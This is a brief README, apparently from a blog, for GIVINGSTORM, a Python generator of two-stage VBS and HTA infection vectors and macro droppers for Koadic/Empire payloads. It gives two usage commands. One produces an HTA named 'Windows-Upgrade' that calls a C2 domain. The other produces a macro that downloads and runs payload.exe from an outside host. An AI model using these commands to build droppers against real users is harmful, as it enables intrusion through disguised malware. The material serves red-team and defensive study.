GIVINGSTORM is a breeze to use. Simply clone the directory, and cd into it. The beginnings of a C2 framework. Currently without all the C2 stuff so far. Generates a dual stage VBS infection vector, and a dual stage HTA infection vector.
The variables take into account C2 addresses, Koadic/Empire payloads, and a few delivery mechanisms. The payload files are output to an aptly named directory “Payloads” that is created if not already present.
Installation & Usage
For the HTA payload: python3 GIVINGSTORM.py -n Windows-Upgrade -p b64encodedpayload -c amazon.com/c2/domain
- HTA Example
![](https://1.bp.blogspot.com/-8H3v_Ds2i4s/XxQfveBtUpI/AAAAAAAAG6I/FGZMSm7eX2QqV1UVx7hxGw6FuOYl2BTtQCLcBGAsYHQ/s1600/HTA.png)
For the Macro Subroutine: python3 GIVINGSTORM.py -n Windows-Upgrade -e amazon.com/final/payload.exe
- Macro Example
![](https://1.bp.blogspot.com/-nJAinpvrWP0/XxQfvg-h3EI/AAAAAAAAG6M/AjBBTpz5QVYD7e_D1kDB3mJ0pRKG2zGhQCLcBGAsYHQ/s1600/Macro.png)